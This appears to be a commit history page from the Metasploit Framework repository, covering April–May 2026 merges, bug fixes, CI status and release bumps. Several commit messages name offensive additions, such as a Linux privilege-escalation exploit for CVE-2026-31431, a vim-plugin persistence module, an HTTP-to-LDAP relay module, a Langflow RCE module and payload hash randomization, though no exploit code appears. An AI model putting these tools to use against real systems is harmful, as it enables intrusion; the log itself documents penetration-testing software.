Compare commits

...

3265 Commits

Author SHA1 Message Date
jenkins-metasploit 1ef3717849 automatic module_metadata_base.json update 2026-05-08 16:35:05 +00:00
Diego Ledda 5814c14781 Merge pull request #21206 from h00die/vim_plugin
vim plugin persistence
2026-05-08 12:24:22 -04:00
jenkins-metasploit 0037e42756 Bump version of framework to 6.4.133 2026-05-08 16:12:09 +00:00
adfoster-r7 33754fd7e8 Merge pull request #21424 from sjanusz-r7/fix-exec-payload-size-crash
Fix exec payload size crash
2026-05-08 17:05:58 +01:00
sjanusz-r7 79b0fd6edc Use rex-text hex string helper, fix module assembly null-terminated string usage
Use rex-text to_hex_cstring keyword arg
2026-05-08 16:41:39 +01:00
sjanusz-r7 8e432f69ca Bump rex-text 2026-05-08 16:41:35 +01:00
sjanusz-r7 d33c2f6600 Re-enabled payload cache size CI specs 2026-05-08 16:35:59 +01:00
Spencer McIntyre 50e5a85521 Merge pull request #21418 from kx7m2qd/fix-get-os-architecture
Fix get_os_architecture for Linux/BSD shell sessions
2026-05-08 09:33:45 -04:00
karan bea8eca0c6 Update rex-arch to 0.1.20 2026-05-08 09:09:10 -04:00
karan d1f9a0fd3b Fix get_os_architecture for Linux/BSD shell sessions
Uses Rex::Arch.from_uname to map uname -m output to ARCH_ constants
for non-meterpreter Linux/BSD shell sessions.

References rapid7/rex-arch#13
Fixes #21403
2026-05-08 09:09:10 -04:00
adfoster-r7 550a8cbdc3 Merge pull request #21425 from g0tmi1k/ftp_stat
ftp: Fix STAT due to unexpected response
2026-05-08 09:28:59 +01:00
g0t mi1k 89b10aa3fe ftp: Fix STAT due to unexpected response 2026-05-08 03:45:38 +01:00
h00die 4da2554a2a cleanup vim plugin 2026-05-07 20:06:32 -04:00
h00die fa69f45366 docs 2026-05-07 15:36:07 -04:00
h00die 5e39ced730 convert persistence mkdirs to lib function 2026-05-07 14:31:12 -04:00
h00die a394578488 vim plugin 2026-05-07 14:17:43 -04:00
Diego Ledda 963eaef422 Merge pull request #21411 from zeroSteiner/fix/linux-x64-exec
Escape strings embedded into the assembly of multiple payloads
2026-05-07 11:11:40 -04:00
jenkins-metasploit 2b42d779a1 automatic module_metadata_base.json update 2026-05-07 12:16:55 +00:00
adfoster-r7 817d3642c3 Merge pull request #21421 from adfoster-r7/update-validation-for-report-vuln
Update validation for report_vuln
2026-05-07 13:06:25 +01:00
adfoster-r7 9435bee69f Update validation for report_vuln 2026-05-07 11:55:39 +01:00
jenkins-metasploit dc1976058c automatic module_metadata_base.json update 2026-05-07 10:40:58 +00:00
adfoster-r7 97fba49fee Merge pull request #21314 from g0tmi1k/report_vuln
Fix #21296 - Add Msf::Auxiliary::Report
2026-05-07 11:28:49 +01:00
jenkins-metasploit 81a7646f0a automatic module_metadata_base.json update 2026-05-06 22:52:54 +00:00
adfoster-r7 a69e2ea707 Merge pull request #21413 from tart0ru5/patch-1
Improve failure condition checks
2026-05-06 23:42:37 +01:00
jenkins-metasploit 2be37dda84 automatic module_metadata_base.json update 2026-05-06 21:23:22 +00:00
Spencer McIntyre 98e588e066 Merge pull request #21410 from inkognitobo/fix/shiro-configurable-gadget-chain
Add configurable JAVA_GADGET_CHAIN option to Shiro module
2026-05-06 17:13:10 -04:00
g0t mi1k e30b6e81ad trace: Add missing report_vuln fields 2026-05-06 17:28:33 +01:00
jenkins-metasploit 38e6629582 automatic module_metadata_base.json update 2026-05-06 15:33:12 +00:00
adfoster-r7 26a7c5f417 Merge pull request #21415 from g0tmi1k/ftp_mixin
ftp: replace @banner_version with banner_version helper method
2026-05-06 16:22:38 +01:00
g0t mi1k b7e1d7ea77 ftp: replace @banner_version with banner_version helper method 2026-05-06 14:46:53 +01:00
jenkins-metasploit e3abb82e88 automatic module_metadata_base.json update 2026-05-06 13:28:27 +00:00
Christophe De La Fuente 696f530475 Merge pull request #21372 from g0tmi1k/ftp_anonymous
ftp_anonymous: Report service/vuln, store loot & update metadata
2026-05-06 15:16:23 +02:00
Spencer McIntyre 6e659caf23 Fix other instances of the same bug 2026-05-06 08:58:15 -04:00
g0t mi1k 48f178a93f ftp_anonymous: Feedback fixes 2026-05-06 13:44:43 +01:00
g0t mi1k ac20cf43e7 ftp_anonymous: Use FTP mixin 2026-05-06 13:32:13 +01:00
g0t mi1k 00c9e33a68 ftp_anonymous: report_service if missing banner 2026-05-06 13:32:13 +01:00
g0t mi1k 825e16bdc5 ftp_anonymous: report_host() when host up, service down 2026-05-06 13:32:13 +01:00
g0t mi1k d647f5f768 ftp_anonymous: Make sure to always disconnect 2026-05-06 13:32:13 +01:00
g0t mi1k 1b1edf938a ftp_anonymous: Clean up FTP banner 2026-05-06 13:32:13 +01:00
g0t mi1k 0f530ec016 ftp_anonymous: Make rubocop happy 2026-05-06 13:32:12 +01:00
g0t mi1k 51b4107dc7 ftp_anonymous: Update ruby code 2026-05-06 13:32:12 +01:00
g0t mi1k 0f696e572c ftp_anonymous: Add notes 2026-05-06 13:32:12 +01:00
g0t mi1k f6484ad724 ftp_anonymous: Store loot 2026-05-06 13:32:12 +01:00
g0t mi1k a0a774e724 ftp_anonymous: Improve logic 2026-05-06 13:32:12 +01:00
g0t mi1k efd59106a0 ftp_anonymous: Report vuln 2026-05-06 13:32:12 +01:00
g0t mi1k 3e320a9db3 ftp_anonymous: Report service 2026-05-06 13:32:12 +01:00
g0t mi1k 726d372257 ftp_anonymous: Remove line prefix 2026-05-06 13:32:12 +01:00
g0t mi1k 2c40a74483 ftp_anonymous: Add CVE 2026-05-06 13:32:12 +01:00
g0t mi1k b40623a0e1 ftp_anonymous: Move module 2026-05-06 13:32:12 +01:00
jenkins-metasploit 7888e29f2c automatic module_metadata_base.json update 2026-05-06 11:12:02 +00:00
adfoster-r7 95492d9680 Merge pull request #21380 from g0tmi1k/ftp_mixin
FTP mixin: Add report_service
2026-05-06 12:00:27 +01:00
g0t mi1k 815afec083 ftp: Add report_host 2026-05-06 10:46:01 +01:00
g0t mi1k 7d824835bc ftp: Add report_note 2026-05-06 10:46:01 +01:00
g0t mi1k 1ce7473b84 ftp: Add report_service 2026-05-06 10:45:55 +01:00
g0t mi1k 98f3bb1d84 ftp: Add banner_version 2026-05-06 10:38:30 +01:00
g0t mi1k 1a9e378dcf ftp: Fix verbose argument fallback 2026-05-06 10:36:59 +01:00
g0t mi1k addbc1b646 ftp: Remove dup IP:PORT in output 2026-05-06 10:36:59 +01:00
tart0ru5 fd6df3fb81 Improve failure condition checks
The prior check silently passes when `res` is `nil` (e.g. request
timeout / host unreachable), because `nil != 403` evaluates to `true`
2026-05-06 11:58:50 +08:00
Spencer McIntyre 9019e4c837 Escape the command in linux/x64/exec 2026-05-05 13:16:30 -04:00
inkognitobo c15d513766 Add configurable JAVA_GADGET_CHAIN option to Shiro module
The gadget chain was previously hardcoded to CommonsCollections2.
Add a JAVA_GADGET_CHAIN OptEnum so operators can select the chain
that matches the target's classpath without modifying the module.

Default remains CommonsCollections2 to preserve existing behaviour.
2026-05-05 17:55:20 +02:00
jenkins-metasploit bc5347f464 automatic module_metadata_base.json update
Command Shell Acceptance / cmd windows-2022 (push) Waiting to run
Command Shell Acceptance / linux ubuntu-latest (push) Waiting to run
Command Shell Acceptance / powershell windows-2025 (push) Waiting to run
Command Shell Acceptance / Generate report (push) Blocked by required conditions
LDAP Acceptance / LDAP Acceptance - ubuntu-latest - Ruby 3.2 (push) Waiting to run
LDAP Acceptance / Generate report (push) Blocked by required conditions
Lint / Lint msftidy (3.2) (push) Waiting to run
Meterpreter Acceptance / build (push) Waiting to run
MSSQL Acceptance / mcr.microsoft.com/mssql/server:2019-latest - ubuntu-latest - Ruby 3.2 (push) Waiting to run
MSSQL Acceptance / mcr.microsoft.com/mssql/server:2022-latest - ubuntu-latest - Ruby 3.2 (push) Waiting to run
MSSQL Acceptance / Generate report (push) Blocked by required conditions
MySQL Acceptance / mariadb:latest - ubuntu-latest - Ruby 3.2 (push) Waiting to run
MySQL Acceptance / mysql:latest - ubuntu-latest - Ruby 3.2 (push) Waiting to run
MySQL Acceptance / Generate report (push) Blocked by required conditions
Postgres Acceptance / postgres:16.2 - ubuntu-latest - Ruby 3.2 (push) Waiting to run
Postgres Acceptance / postgres:9.4 - ubuntu-latest - Ruby 3.2 (push) Waiting to run
Postgres Acceptance / Generate report (push) Blocked by required conditions
SMB Acceptance / build (push) Waiting to run
Verify / Docker Build (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.2 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" MSF_FEATURE_DEFER_MODULE_LOADS=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.2 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.2 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.2 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.2 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.3 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.3 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.3 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.3 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.4 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.4 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.4 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.4 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" (push) Waiting to run
2026-05-04 13:49:03 +00:00
Diego Ledda edb6844c8f Merge pull request #21404 from zeroSteiner/feat/cve-2026-31431
Fix ARMLE exec and add to Copy Fail
2026-05-04 09:37:28 -04:00
jenkins-metasploit 909c8df2cf automatic module_metadata_base.json update 2026-05-01 13:50:15 +00:00
adfoster-r7 bbb2452063 Merge pull request #21342 from adfoster-r7/defer-loading-dependencies
Defer loading rex/metasm/octokit/etc dependencies
2026-05-01 14:37:27 +01:00
Spencer McIntyre 0c81638fff Fix ARMLE exec and add to Copy Fail 2026-04-30 20:03:04 -04:00
adfoster-r7 557ff0d068 Defer loading dependencies 2026-05-01 00:07:59 +01:00
jenkins-metasploit 5a2e7bb301 Bump version of framework to 6.4.132 2026-04-30 23:06:36 +00:00
jenkins-metasploit e8bb3cd5fb automatic module_metadata_base.json update 2026-04-30 22:30:05 +00:00
Brendan dc97d1e97e Merge pull request #21395 from zeroSteiner/feat/cve-2026-31431
Add exploit for CVE-2026-31431 (Copy Fail)
2026-04-30 17:19:08 -05:00
Spencer McIntyre 66995d3987 Only allow x64 and AARCH64 for now 2026-04-30 17:51:30 -04:00
Spencer McIntyre cdcdb5fe88 Normalize reported ARMLE architectures from Meterpreter 2026-04-30 17:09:33 -04:00
Spencer McIntyre bc0f7602c2 Only bind the socket once 2026-04-30 17:09:32 -04:00
Spencer McIntyre 0e02f10078 Add support for more architectures 2026-04-30 17:09:32 -04:00
Spencer McIntyre c0e5ceb531 Add an AARCH64 exec payload 2026-04-30 17:09:32 -04:00
Spencer McIntyre a0c5b9a6bc Merge pull request #21315 from cdelafuente-r7/mcp-server
MCP Server, specs and documentation
2026-04-30 16:33:18 -04:00
Spencer McIntyre e14ce079bb Appease rubocop 2026-04-30 15:18:18 -04:00
Spencer McIntyre 22a9dc4522 Add docs 2026-04-30 14:54:09 -04:00
Spencer McIntyre 55f9216698 Finish the exploit check and cleanup methods 2026-04-30 14:39:46 -04:00
jenkins-metasploit e2e210d038 automatic module_metadata_base.json update 2026-04-30 15:40:08 +00:00
cgranleese-r7 a2b57ae998 Merge pull request #21352 from adfoster-r7/improve-checkcode-messages-5
Add human-readable descriptions to CheckCode returns in modules
2026-04-30 16:29:07 +01:00
Spencer McIntyre 12e08fb451 Add an expanded check 2026-04-30 10:54:17 -04:00
adfoster-r7 3bee31ff5e Update checkcodes and bug fixes 2026-04-30 15:42:10 +01:00
Spencer McIntyre d0a205f776 Add the initial LPE exploit 2026-04-30 09:53:35 -04:00
Spencer McIntyre 9f6349de7d Initial commit of updated stub
Stub has been updated to forward arguments to /bin/sh
2026-04-30 09:53:12 -04:00
jenkins-metasploit 5942122b9a automatic module_metadata_base.json update 2026-04-30 10:06:45 +00:00
cgranleese-r7 49ea1a3391 Merge pull request #21359 from adfoster-r7/improve-checkcode-messages-12
Add human-readable descriptions to CheckCode returns in modules
2026-04-30 10:46:41 +01:00
cgranleese-r7 b3fbeced43 Merge pull request #21355 from adfoster-r7/improve-checkcode-messages-8
Add human-readable descriptions to CheckCode returns in modules
2026-04-30 10:44:04 +01:00
cgranleese-r7 7b3aef8ede Merge pull request #21353 from adfoster-r7/improve-checkcode-messages-6
Add human-readable descriptions to CheckCode returns in modules
2026-04-30 10:43:21 +01:00
Christophe De La Fuente 6f3884e832 Redesign the logging capability using Rex::Logging and Rake middleware
- remove the original Logger
- use Rex::Logging with helper methods (dlog, ilog, etc.)
- add `sanitize` configuration option
- create Sanitizing, JsonFlatfile and JsonStream sinks for JSON logging format
- minor updates in apply_default (Loader)
- update the re-authentication logic (fix a specific usecase)
- add a Rack middleware that logs MCP HTTP request/response
- use Rex::Socket::Tcp instead of TcpSocket
- update the ensure_rpc_available for better validation
- use around_request instead of the deprecated SDK instrumentation for logging
- update and add specs
2026-04-30 11:10:09 +02:00
adfoster-r7 b59ced5057 Add human-readable descriptions to CheckCode returns in multi/http exploit modules (A-O) 2026-04-30 00:25:30 +01:00
adfoster-r7 0bf595c2ec Add human-readable descriptions to CheckCode returns in unix/webapp exploit modules 2026-04-30 00:16:04 +01:00
jenkins-metasploit 15a0f6eefd automatic module_metadata_base.json update 2026-04-29 19:30:36 +00:00
Spencer McIntyre 2634142f0d Merge pull request #21323 from jheysel-r7/feat/http_to_ldap
HTTP to LDAP Relay Module
2026-04-29 15:20:10 -04:00
Spencer McIntyre 2153daad7b Update the specs 2026-04-29 14:38:29 -04:00
Jack Heysel 4847d88441 HTTP to LDAP Relay Module and Supporting Libraries
Remove unnecessary code

Remove commented out code

Added documentation

Responded to Spencer and Copilot

Add anonymous identity check

Doc update

Warning surpression

Renamed ldap_client to relayed_connection

Comments
2026-04-29 07:48:42 -07:00
jenkins-metasploit 788aa2abc5 automatic module_metadata_base.json update 2026-04-29 13:18:45 +00:00
Spencer McIntyre 2cfdfcba60 Merge pull request #21392 from dwelch-r7/skip-windows-test-on-non-windows-system
skip Windows-specific tests on non-Windows platforms
2026-04-29 09:08:03 -04:00
dwelch-r7 bcae34ee4f Update test/modules/post/test/cmd_exec.rb
Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
2026-04-29 13:11:06 +01:00
Dean Welch 6df54a639e skip Windows-specific tests on non-Windows platforms 2026-04-29 13:05:17 +01:00
jenkins-metasploit 41a937c70c automatic module_metadata_base.json update 2026-04-27 11:20:38 +00:00
adfoster-r7 63f4f358c7 Merge pull request #21092 from sjanusz-r7/fix-macos-mingw-syscall_inject-compilation
Fix syscall_inject compilation errors on MacOS with MinGW 15
2026-04-27 12:09:19 +01:00
adfoster-r7 1e3727ba87 Add human-readable descriptions to CheckCode returns in remaining multi exploit modules 2026-04-25 10:52:11 +01:00
jenkins-metasploit e909b9218b Bump version of framework to 6.4.131 2026-04-25 08:54:14 +00:00
adfoster-r7 d121ff6a62 Merge pull request #21307 from adfoster-r7/improve-vuln-and-vuln-attempt-tracking
Improve vuln and vuln attempt tracking
2026-04-24 18:36:28 +01:00
adfoster-r7 e00515c172 Update logic for aux modules having called report_vuln already 2026-04-24 16:26:49 +01:00
adfoster-r7 3ecbadd032 Improve vuln and vuln attempt tracking 2026-04-24 16:26:49 +01:00
cgranleese-r7 7c4f15a024 Merge pull request #21354 from adfoster-r7/improve-checkcode-messages-7
Add human-readable descriptions to CheckCode returns in modules
2026-04-24 16:13:19 +01:00
adfoster-r7 7479078bf1 Merge pull request #21356 from adfoster-r7/improve-checkcode-messages-9
Add human-readable descriptions to CheckCode returns in modules
2026-04-24 15:25:45 +01:00
adfoster-r7 b09686efaf Merge pull request #21357 from adfoster-r7/improve-checkcode-messages-10
Add human-readable descriptions to CheckCode returns in modules
2026-04-24 15:25:19 +01:00
adfoster-r7 b765db798e Merge pull request #21358 from adfoster-r7/improve-checkcode-messages-11
Add human-readable descriptions to CheckCode returns in modules
2026-04-24 15:25:00 +01:00
Simon Janusz aa14df9b6c Merge pull request #21368 from sjanusz-r7/change-php-payload-size
Change PHP payload die func message
2026-04-24 13:47:19 +01:00
adfoster-r7 1d1c284619 Merge pull request #21364 from sjanusz-r7/update-payload-cached-sizes-on-new-metadata-cache
Update payload cached sizes when creating new module metadata cache
2026-04-24 11:15:55 +01:00
sjanusz-r7 a153814b0f Change PHP payload die func message 2026-04-24 11:08:38 +01:00
jenkins-metasploit 17f7f4d718 Bump version of framework to 6.4.130 2026-04-23 15:02:38 +00:00
jenkins-metasploit 74468290c9 automatic module_metadata_base.json update 2026-04-23 14:54:17 +00:00
Spencer McIntyre 540139cd4a Merge pull request #21341 from g0tmi1k/smb
Fix various smb/samba issues
2026-04-23 10:45:58 -04:00
adfoster-r7 370c35c1e2 Add human-readable descriptions to CheckCode returns in windows/http exploit modules 2026-04-23 15:37:09 +01:00
jenkins-metasploit cb1cfbbe98 automatic module_metadata_base.json update 2026-04-23 14:21:28 +00:00
Brendan 2289fc07ce Merge pull request #21260 from Takahiro-Yoko/langflow_rce_cve_2026_27966
Add Langflow RCE module (CVE-2026-27966)
2026-04-23 09:12:12 -05:00
cgranleese-r7 107edff1cb Merge pull request #21278 from adfoster-r7/fix-msftidy-heading-in-codeblock-edgecase
Fix msftidy heading in codeblock edgecase
2026-04-23 13:23:55 +01:00
jenkins-metasploit 4521c9f3d3 automatic module_metadata_base.json update 2026-04-23 12:03:13 +00:00
g0t mi1k 76cae04e91 smb_login: Add report_service (regardless of RECORD_GUEST)
RECORD_GUEST = creds, not service
2026-04-23 12:59:19 +01:00
g0t mi1k 4f77df25ba smb_uninit_cred: Add report_service 2026-04-23 12:59:19 +01:00
g0t mi1k 792a4254ac smb_uninit_cred: Print correct port 2026-04-23 12:59:19 +01:00
g0t mi1k eb5b5a1277 smb_uninit_cred: Rex::Proto::DCERPC::Exceptions::Fault DCERPC FAULT => nca_op_rng_error 2026-04-23 12:59:18 +01:00
g0t mi1k 950fb9def6 smb_lookupsid: Hide table if results empty 2026-04-23 12:59:18 +01:00
g0t mi1k 2e58eb1207 psexec_loggedin_users: NoMethodError. undefined method `each_line' for false 2026-04-23 12:59:18 +01:00
g0t mi1k a173ea15fa smb_version: Remove duplicated report_service 2026-04-23 12:59:18 +01:00
g0t mi1k 3c1b245751 Fix #21339: NoMethodError undefined method `each' for an instance of String 2026-04-23 12:59:18 +01:00
g0t mi1k ca27731285 Fix #21338: NoMethodError undefined method `domain_handle' for nil 2026-04-23 12:59:18 +01:00
g0t mi1k 2d93669f56 Fix #21337: NoMethodError' 'undefined method `empty?' for nil 2026-04-23 12:59:18 +01:00
cgranleese-r7 1142d4e15d Merge pull request #21351 from adfoster-r7/improve-checkcode-messages-4
Add human-readable descriptions to CheckCode returns modules
2026-04-23 12:54:31 +01:00
adfoster-r7 96a37da14a Add human-readable descriptions to CheckCode returns in multi/http exploit modules (P-Z) 2026-04-23 12:26:32 +01:00
sjanusz-r7 f00bbe6451 Update payload cached sizes when creating new module metadata cache 2026-04-23 12:06:09 +01:00
jenkins-metasploit f1778187b8 automatic module_metadata_base.json update 2026-04-23 11:04:15 +00:00
cgranleese-r7 9ad8b7ac32 Merge pull request #21360 from adfoster-r7/improve-checkcode-messages-13
Add human-readable descriptions to CheckCode returns in modules
2026-04-23 11:55:46 +01:00
jenkins-metasploit 8a5d7be47a automatic module_metadata_base.json update 2026-04-23 10:45:19 +00:00
cgranleese-r7 591dbdd821 Merge pull request #21350 from adfoster-r7/improve-checkcode-messages-3
Add human-readable descriptions to CheckCode returns in modules
2026-04-23 11:33:27 +01:00
adfoster-r7 c38f6b4858 Update checkcodes and bug fixes 2026-04-23 10:20:53 +01:00
adfoster-r7 3e61396ec2 Add human-readable descriptions to CheckCode returns in unix, freebsd, osx, and other exploit modules 2026-04-23 10:02:22 +01:00
jenkins-metasploit e5bdc50a4f automatic module_metadata_base.json update 2026-04-22 20:35:33 +00:00
Spencer McIntyre 44d60c0865 Merge pull request #21347 from g0tmi1k/smb_version
smb_version: Make SMBv1 happy
2026-04-22 16:27:08 -04:00
adfoster-r7 2ae936473e Add human-readable descriptions to CheckCode returns in remaining windows exploit modules 2026-04-22 18:44:55 +01:00
adfoster-r7 45bc95a876 Add human-readable descriptions to CheckCode returns in windows/local exploit modules 2026-04-22 18:43:59 +01:00
adfoster-r7 aaf536d189 Merge pull request #21361 from sjanusz-r7/payload-cache-size-changes
Comment out payload size cache tests
2026-04-22 17:13:23 +01:00
sjanusz-r7 8587d1c211 Skip payload cached size specs 2026-04-22 16:31:51 +01:00
adfoster-r7 05befe18b1 Add human-readable descriptions to CheckCode returns in linux/local exploit modules 2026-04-22 15:06:59 +01:00
jenkins-metasploit 7851cda71d automatic module_metadata_base.json update 2026-04-22 13:49:02 +00:00
cgranleese-r7 380911db97 Merge pull request #21349 from adfoster-r7/improve-checkcode-messages-2
Add human-readable descriptions to CheckCode returns in modules
2026-04-22 14:32:05 +01:00
cgranleese-r7 de636c1457 Merge pull request #21348 from adfoster-r7/improve-checkcode-messages-1
Add human-readable descriptions to CheckCode returns in modules
2026-04-22 14:30:48 +01:00
adfoster-r7 f3b07d5a49 Add human-readable descriptions to CheckCode returns in auxiliary and post modules 2026-04-22 13:56:54 +01:00
adfoster-r7 2cbb3942b6 Add human-readable descriptions to CheckCode returns in linux/http exploit modules (A-M) 2026-04-22 13:08:59 +01:00
g0t mi1k b7f136077e smb_version: Be more verbose - show smb1 if possible 2026-04-22 13:08:20 +01:00
g0t mi1k 0474c0ce24 smb_version: Add spacing between : 2026-04-22 13:08:20 +01:00
g0t mi1k 1d9c922488 Make smb_version happy with smbv1 2026-04-22 13:08:19 +01:00
cgranleese-r7 25d7c25ad8 Merge pull request #21346 from adfoster-r7/fix-false-positive-on-couchdb-enum-check
Fix false positive on couchdb enum check
2026-04-22 12:38:47 +01:00
adfoster-r7 19d333df13 Add human-readable descriptions to CheckCode returns in linux/http exploit modules (N-Z) 2026-04-22 11:55:15 +01:00
adfoster-r7 6e992aa6ed Fix false positive on couchdb enum check 2026-04-21 22:48:27 +01:00
jenkins-metasploit 9efc727462 automatic module_metadata_base.json update 2026-04-21 17:21:45 +00:00
Christophe De La Fuente 4c0f2c29bc Merge pull request #21019 from g0tmi1k/phpmyadmin_config 2026-04-21 19:13:04 +02:00
jenkins-metasploit 9692b8865f automatic module_metadata_base.json update 2026-04-21 17:08:11 +00:00
Spencer McIntyre 6a00ea38c6 Merge pull request #21306 from dledda-r7/feat/block-api-randomization
Block Api ROR13 IV randomization
2026-04-21 12:58:30 -04:00
Christophe De La Fuente 946d1a44b5 Fix Notes format (array) 2026-04-21 18:43:54 +02:00
jenkins-metasploit cca7166eb4 automatic module_metadata_base.json update 2026-04-21 15:05:42 +00:00
adfoster-r7 a918184416 Merge pull request #21344 from adfoster-r7/fix-elasticsearch-traversal-check-support
Fix elasticsearch traversal check support
2026-04-21 15:57:26 +01:00
adfoster-r7 81f1a7c86a Fix elasticsearch traversal check support 2026-04-21 15:18:58 +01:00
adfoster-r7 97ab01cddd Merge pull request #21340 from dledda-r7/ci/disable-meterpreter-ci
Disable Windows Server 2022 CI
2026-04-21 15:01:35 +01:00
dledda-r7 b9573fa0ce ops(meterpreter): disable windows server 2022 build until 141_xp dependency is removed 2026-04-21 05:55:29 -04:00
dledda-r7 e40422845b fix: block_api.rb update 2026-04-21 05:43:34 -04:00
Spencer McIntyre 20065b3f3d Fix the include errors 2026-04-20 18:36:00 -04:00
Spencer McIntyre 44a45ffdbf Switch to Rex::Logging 2026-04-20 18:14:56 -04:00
Brendan 2dbfcfb918 Merge pull request #21232 from bcoles/file-find_writable_directories
Add find_writable_directories to Msf::Post::File
2026-04-20 16:33:53 -05:00
jenkins-metasploit ae63cb9b1d automatic module_metadata_base.json update 2026-04-20 20:41:14 +00:00
Brendan 6b57b4c66f Merge pull request #21256 from g0tmi1k/webdav
WebDAV improvements
2026-04-20 15:30:43 -05:00
Christophe De La Fuente 820e737024 Update from code review and some fixes
- add the `--mcp-transport` option
- prefix the MCP env. variable with `MSF_`
- move the code under `lib/msf/core/mcp/`
- move specs under `spec/lib/msf/core/mcp/`
- change the namespace from `MsfMcp` to `Msf::RPC`
- update the `lib/msf_autoload.rb` to exclude the mcp-related files
- add missing validation for the `mcp`, `rate_limit and `logging` sections in the config file
- remove duplicate error exception classes
- fix an error in the transformers related to the `created_at` field
- fix a small issue in the input validator when regex are used
- update the way error is reported for MCP Tools to be compatible with the changes in the new `mcp` gem
- update and add specs
2026-04-20 18:29:21 +02:00
adfoster-r7 bd2e11ad55 Merge pull request #21331 from bcoles/metadata-obj
Metadata::Obj: Deduplicate notes hash strings and memoize `Obj#path` to reduce retained memory in the module metadata cache
2026-04-20 16:55:33 +01:00
jenkins-metasploit 6acac8e120 automatic module_metadata_base.json update 2026-04-20 13:31:53 +00:00
cgranleese-r7 a53d0a027b Merge pull request #21332 from adfoster-r7/remove-false-positive-from-nodejs-pipelining-check
Remove false positive from nodejs pipelining check
2026-04-20 14:22:23 +01:00
Diego Ledda 46553b5984 Update lib/msf/core/payload/windows/x64/block_api_x64.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-04-20 15:19:47 +02:00
Diego Ledda 5622bd254b Update lib/msf/core/payload/windows/x64/block_api_x64.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-04-20 15:19:07 +02:00
Diego Ledda 2c58825343 Update lib/msf/core/payload/windows/x64/block_api_x64.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-04-20 15:18:54 +02:00
adfoster-r7 f060acd1e9 Remove false positive from nodejs pipelining check 2026-04-20 14:02:56 +01:00
bcoles 09bb98d13e Memoize Obj#path to avoid repeated File.join
The install_root path is immutable at runtime, so cache the computed
full path on first access instead of calling File.join on every call.
2026-04-20 22:19:55 +10:00
bcoles 76a7f61465 Deduplicate notes hash keys and values in metadata Obj
Notes keys ("Stability", "SideEffects", "Reliability") and values
("crash-safe", "ioc-in-logs", etc.) are repeated across thousands of
modules. Use frozen string dedup (-str) to share a single object per
unique string, reducing ~24K string allocations to ~185 shared objects.
2026-04-20 22:17:40 +10:00
adfoster-r7 e09a38085c Merge pull request #21330 from bcoles/modules-loader
Replace Pathname with string prefix removal in directory module loader
2026-04-20 11:45:33 +01:00
adfoster-r7 fe1aeb9279 Merge pull request #21329 from bcoles/modulemanager-cache
Simplify get_parent_path with rindex instead of split/join
2026-04-20 11:30:04 +01:00
adfoster-r7 9b985dc1ef Merge pull request #21327 from tair-m/master
Fix uninitialized constant HTTP::CookieJar by correcting load order in http_cookie_jar.rb
2026-04-20 10:39:02 +01:00
bcoles a8ccdfc1e4 Simplify get_parent_path with rindex instead of split/join
Replace File.join + String#split + array slice + Array#join with a
single String#rindex lookup. This avoids allocating intermediate arrays
and strings on every call (once per cached module during startup).
2026-04-20 18:22:53 +10:00
bcoles b1c4fd3f39 Replace Pathname with string prefix removal in directory module loader
Msf::Modules::Loader::Directory#each_module_reference_name created two
Pathname objects per module file and called relative_path_from to derive
the module reference name. With ~5,000 module files this produced
~170,000 calls to Pathname#chop_basename internally.

Since Rex::Find.find always yields absolute paths rooted at
full_entry_path, simple String#delete_prefix achieves the same result
without allocating Pathname objects.
2026-04-20 18:14:54 +10:00
Takah1ro f54374eaff Update exploit to improve stability 2026-04-18 12:56:53 +09:00
tair 4607741a16 Fix LoadError in http_cookie_jar for Ruby 3.3.0 2026-04-18 07:17:26 +05:00
g0t mi1k 94b4f577e0 WebDAV: MR feedback 2026-04-17 22:19:26 +01:00
jenkins-metasploit 046ba861b3 automatic module_metadata_base.json update 2026-04-17 16:21:38 +00:00
jheysel-r7 08f6dc20a5 Merge pull request #21122 from bootstrapbool/camaleon_cms_cve_2024_46987
Camaleon CMS CVE 2024 46987
2026-04-17 09:13:07 -07:00
Takah1ro a47234778c Increase WfsDelay 2026-04-17 23:54:43 +09:00
adfoster-r7 92af54c885 Merge pull request #21230 from bcoles/obj-dedup-cache
Reduce memory footprint of module metadata Obj instances
2026-04-17 12:33:23 +01:00
adfoster-r7 19112a0212 Merge pull request #21231 from bcoles/msf-module-cache
Module metadata: Fix stale module detection and add per-type metadata index
2026-04-17 11:25:44 +01:00
dledda-r7 679d2a9a4e feat: enhance block_api_iv handling with warnings and options for payload methods 2026-04-17 06:07:18 -04:00
bcoles 785307f55e Module metadata: Fix stale module detection and add per-type metadata index 2026-04-17 19:41:18 +10:00
dledda-r7 82c8028f1c refactor: remove redundant block_api_iv calls in payload generation methods 2026-04-17 05:38:19 -04:00
